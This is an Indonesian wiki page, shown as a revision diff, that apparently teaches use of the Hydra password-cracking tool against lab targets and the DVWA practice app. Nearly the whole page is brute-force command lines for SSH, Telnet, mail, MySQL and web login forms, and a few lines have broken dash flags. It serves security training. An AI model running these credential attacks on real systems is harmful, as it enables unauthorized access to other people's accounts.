Hydra: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
← Older editNewer edit →
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
Line 13: Line 13:
  Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
  Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.


Contoh cara menggunakan
==Contoh==


  hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
  hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
Line 27: Line 27:
  hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh
  hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh


Untuk DVWA
==Untuk DVWA (HTTP-POST-FORM)==
 
hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”


  hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed"
  hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed"


  hydra -l admin -p password   http-get-form "/DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
  hydra -l admin -p password 192.168.0.102 http-get-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
  hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
 
  hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.80 http-post-form
  hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
  hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.97 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
 
  hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.102 http-post-form
 
  hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.102 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"




Revision as of 22:41, 18 February 2020

Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang 

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql

hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh

Untuk DVWA (HTTP-POST-FORM)

hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”

hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed"

hydra -l admin -p password 192.168.0.102 http-get-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"

hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form

hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.102 http-post-form

hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.102 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"


Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=Hydra&oldid=59942"